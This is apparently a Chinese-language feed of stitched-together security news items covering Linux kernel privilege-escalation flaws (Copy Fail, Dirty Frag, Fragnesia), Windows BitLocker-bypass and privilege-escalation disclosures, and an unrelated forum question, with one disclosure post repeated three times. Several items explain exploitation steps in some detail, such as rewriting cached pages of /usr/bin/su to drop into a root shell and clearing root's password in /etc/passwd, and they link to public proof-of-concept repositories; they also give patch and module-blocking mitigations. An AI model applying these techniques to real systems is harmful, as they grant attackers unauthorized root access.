内核更新到 6.12.87 修复 CVE-2026-31431 (“copyfail”)。在早期版本中,这只影响了 starfive 目标用户和安装了 kmod-crypto-user 的用户。 一些 bug 修复。建议还没有用上 25.12 版的升级。 https://downloads.openwrt.org/releases/25.12.4/targets/ 提权漏洞 copyfail 这个在 openwrt 其实基本上没有影响。openwrt 的程序几乎都是以 root 运行的。 其它系统就要赶紧升级了 利用代码已经出了了 https://github.com/V4bel/dirtyfrag
从4月30日至今,Linux 已经连爆三起提权漏洞,只需要一行代码,立即获得系统 root 权限。 Fragnesia 漏洞 这次漏洞被叫做 Fragnesia(PoC 仓库代码),编号 CVE-2026-46300,得分 7.8 分。 Fragnesia 属于 Dirty Frag 漏洞家族,但并
IT之家 5 月 14 日消息,科技媒体 cyberkendra 昨日(5 月 13 日)发布博文,Linux 内核在 2 周内遭遇“3 重暴击”,继 Copy Fail、Dirty Frag 两个漏洞外, 又发现 Fragnesia 新漏洞。 该漏洞由 William Bowling 和安全研究团队 V12 Security 披露,是一个本地提权漏洞,任何未授权本地用户不需要宿主机层面的现成权限,就能借此稳定获取 root 最高权限。 IT之家援引博文介绍,该漏洞目标仍是 Linux 内核的 XFRM ESP-in-TCP,该子系统通过 TCP 处理 IPsec 加密流量的部分。 问题核心是内核在处理共享页碎片与 socket buffer(套接字缓冲区)合并时出现逻辑缺陷,导致系统“忘记”某个碎片仍被共享,进而给攻击者留下可控写入空间。 该漏洞不依赖竞争条件。攻击者先调用 unshare (),创建隔离的用户命名空间和网络命名空间,再在这个隔离环境里拿到 CAP_NET_ADMIN(网络管理能力)。 攻击者随后利用已知 AES-128-GCM 密钥布置特制的 ESP 安全关联,并构造 256 项查找表,为后续逐字节改写做准备。 攻击者利用代码把目标二进制文件 /usr/ bin / su 的页面直接拼接进 TCP 套接字缓冲区,再切换到 espintcp ULP(上层协议)模式。 此时内核会尝试原地解密队列中的数据,结果是 AES-GCM 密钥流直接异或进该文件在页缓存中的副本。攻击者于是能精确翻转指定字节,把 su 开头前 192 字节改成一个会调用 setresuid(0,0,0)并执行 /bin/ sh 的小型 ELF 桩代码。 对管理员来说,最麻烦的是磁盘上的 /usr/ bin / su 并不会被改写,篡改只存在于内存页缓存里。因此,很多文件完整性检查可能看不出问题,但一旦有人运行 su,就可能直接落入 root shell。 研究人员称,凡是受 Dirty Frag 影响、且没有打上 2026 年 5 月 13 日补丁的内核,同样会受 Fragnesia 影响。 安全团队在 Ubuntu 22.04、24.04 发行版上已成功验证该漏洞,测试版本包括 6.8.0-111-generic。Ubuntu 默认对非特权用户命名空间施加的 AppArmor 限制能稍微提高门槛,但原文称这只需要额外绕过一步,不属于漏洞本体的防护。 现阶段缓解办法与 Dirty Frag 相同。如果系统不依赖 IPsec ESP 或 RxRPC 协议,最快的临时方案是禁用相关脆弱模块。 若怀疑系统已经中招,需要先清理页缓存中的 /usr/ bin / su 篡改副本,或者直接重启。更稳妥的做法仍是尽快安装发行版提供的内核补丁;针对这个具体漏洞的上游补丁,已在 2026 年 5 月 13 日提交。 相关阅读: 《 微软警告“Dirty Frag”Linux 内核漏洞已遭黑客利用 》 《 Dirty Frag 漏洞链曝光:几乎影响所有主流 Linux 发行版,可提权至 root 》 《 Linux 内核潜伏 9 年漏洞披露:732 字节脚本攻破 Ubuntu 等发行版,提权至 root 最高权限 》 参考 Fragnesia GitHub
IT之家 5 月 14 日消息,科技媒体 bleepingcomputer 昨日(5 月 13 日)发布博文,报道称网络安全专家 Chaotic Eclipse 披露 YellowKey 与 GreenPlasma 两个漏洞, 影响 Windows 11、Windows Server 2022/2025 等系统。 基于披露的漏洞细节,YellowKey 可以绕过系统的 BitLocker 防护,影响 Windows 11、Windows Server 2022、Windows Server 2025 等系统。 Eclipse 指出在 USB 优盘中放入特制的 FsTx 文件,或者写入目标磁盘的 EFI 分区,再重启进入 WinRE,通过按住 CTRL 键触发 shell。若利用成功,这个 shell 将直接访问受 BitLocker 保护、但已在启动流程中自动解锁的存储卷。 独立安全研究员 Kevin Beaumont 确认 YellowKey 有效,并建议启用 BitLocker PIN 与 BIOS 密码缓解风险。Will Dormann 也确认了基于 USB 中 FsTx 文件的利用链,但未复现 EFI 分区路径。 不过对于普通用户而言,影响范围相对有限,现阶段公开的 YellowKey 漏洞概念验证仅支持开启 TPM BitLocker 保护且无密码保护的设备。 而另一个 GreenPlasma 漏洞则用于本地提权,普通权限用户可在 SYSTEM 可写的目录对象中创建任意内存节对象,进而影响信任这些路径的高权限服务或驱动。 不过,当前披露的概念验证并不完整,缺少拿到完整 SYSTEM shell 的关键组件,因此外界暂时只能确认存在提权思路,还不能把它视为开箱即用的完整攻击工具。 GreenPlasma 漏洞演示截图 IT之家附上参考地址 YellowKey Chaotic Eclipse GreenPlasma
各位佬们,求助自动审查的自动提权超出次数之后如何解决,只能开最大权限吗,又怕gpt误删文件,求解答,谢谢 2 个帖子 - 2 位参与者 阅读完整话题
该漏洞由韩国安全研究员 Hyunwoo Kim (网名 @ v4bel )发现并报告。POC 已于 2026 年 5 月 7 日在 GitHub 公开,任何人均可通过单行命令完成编译并执行。 漏洞源自脏写入了零拷贝路径,由两个独立模块链式组合后构成。具体可参考: Dirty Frag 属于与 Dirty Pipe ( CVE-2022-0847 )和 Copy Fail 相同的漏洞类——零拷贝发送路径上,splice()将攻击者只有读权限的 page cache 页直接钉入 struct sk_buff 的 frag 槽,而接收侧内核代码对该 frag 执行原地( in-place )加密/解密,导致只读 page cache 被写入。 其一利用 IPsec ESP 模块(存在约 9 年,自 2017 年起受影响),可将 /usr/bin/su 替换为恶意程序,需要创建用户命名空间的权限;其二利用 RxRPC 协议模块(自 2023 年起受影响),可清空 /etc/passwd 中 root 的密码字段,完全无需任何特殊权限。两个变体互相覆盖对方的限制,使得单一攻击程序可在几乎所有主流 Linux 发行版上通用。 上游 Linux 内核已于 5 月 7 日合并了针对 ESP 模块的修复补丁,但 RxRPC 模块的补丁尚未合并。由于协调披露期间遭第三方抢先公开,各发行版未能按计划准备 backport ,导致当前所有发行版内核均处于无补丁状态,CVE 编号亦尚未分配。 2026-04-29/30:作者向 [email protected] 提交漏洞和补丁 2026-05-07:作者向 linux-distros 提交,设定 5 天 embargo 2026-05-07 同日:不相关的第三方将 exploit 公开至互联网,embargo 被打破 2026-05-07:作者与发行版维护者协商后,决定全面公开 Dirty Frag 文档 官方建议的缓解措施: printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \ > /etc/modprobe.d/dirtyfrag.conf PS:Arch 系的赶紧去滚吧~
该漏洞由韩国安全研究员 Hyunwoo Kim (网名 @ v4bel )发现并报告。POC 已于 2026 年 5 月 7 日在 GitHub 公开,任何人均可通过单行命令完成编译并执行。 漏洞源自脏写入了零拷贝路径,由两个独立模块链式组合后构成。具体可参考: Dirty Frag 属于与 Dirty Pipe ( CVE-2022-0847 )和 Copy Fail 相同的漏洞类——零拷贝发送路径上,splice()将攻击者只有读权限的 page cache 页直接钉入 struct sk_buff 的 frag 槽,而接收侧内核代码对该 frag 执行原地( in-place )加密/解密,导致只读 page cache 被写入。 其一利用 IPsec ESP 模块(存在约 9 年,自 2017 年起受影响),可将 /usr/bin/su 替换为恶意程序,需要创建用户命名空间的权限;其二利用 RxRPC 协议模块(自 2023 年起受影响),可清空 /etc/passwd 中 root 的密码字段,完全无需任何特殊权限。两个变体互相覆盖对方的限制,使得单一攻击程序可在几乎所有主流 Linux 发行版上通用。 上游 Linux 内核已于 5 月 7 日合并了针对 ESP 模块的修复补丁,但 RxRPC 模块的补丁尚未合并。由于协调披露期间遭第三方抢先公开,各发行版未能按计划准备 backport ,导致当前所有发行版内核均处于无补丁状态,CVE 编号亦尚未分配。 2026-04-29/30:作者向 [email protected] 提交漏洞和补丁 2026-05-07:作者向 linux-distros 提交,设定 5 天 embargo 2026-05-07 同日:不相关的第三方将 exploit 公开至互联网,embargo 被打破 2026-05-07:作者与发行版维护者协商后,决定全面公开 Dirty Frag 文档 官方建议的缓解措施: printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \ > /etc/modprobe.d/dirtyfrag.conf PS:Arch 系的赶紧去滚吧~
该漏洞由韩国安全研究员 Hyunwoo Kim (网名 @ v4bel )发现并报告。POC 已于 2026 年 5 月 7 日在 GitHub 公开,任何人均可通过单行命令完成编译并执行。 漏洞源自脏写入了零拷贝路径,由两个独立模块链式组合后构成。具体可参考: Dirty Frag 属于与 Dirty Pipe ( CVE-2022-0847 )和 Copy Fail 相同的漏洞类——零拷贝发送路径上,splice()将攻击者只有读权限的 page cache 页直接钉入 struct sk_buff 的 frag 槽,而接收侧内核代码对该 frag 执行原地( in-place )加密/解密,导致只读 page cache 被写入。 其一利用 IPsec ESP 模块(存在约 9 年,自 2017 年起受影响),可将 /usr/bin/su 替换为恶意程序,需要创建用户命名空间的权限;其二利用 RxRPC 协议模块(自 2023 年起受影响),可清空 /etc/passwd 中 root 的密码字段,完全无需任何特殊权限。两个变体互相覆盖对方的限制,使得单一攻击程序可在几乎所有主流 Linux 发行版上通用。 上游 Linux 内核已于 5 月 7 日合并了针对 ESP 模块的修复补丁,但 RxRPC 模块的补丁尚未合并。由于协调披露期间遭第三方抢先公开,各发行版未能按计划准备 backport ,导致当前所有发行版内核均处于无补丁状态,CVE 编号亦尚未分配。 2026-04-29/30:作者向 [email protected] 提交漏洞和补丁 2026-05-07:作者向 linux-distros 提交,设定 5 天 embargo 2026-05-07 同日:不相关的第三方将 exploit 公开至互联网,embargo 被打破 2026-05-07:作者与发行版维护者协商后,决定全面公开 Dirty Frag 文档 官方建议的缓解措施: printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \ > /etc/modprobe.d/dirtyfrag.conf PS:Arch 系的赶紧去滚吧~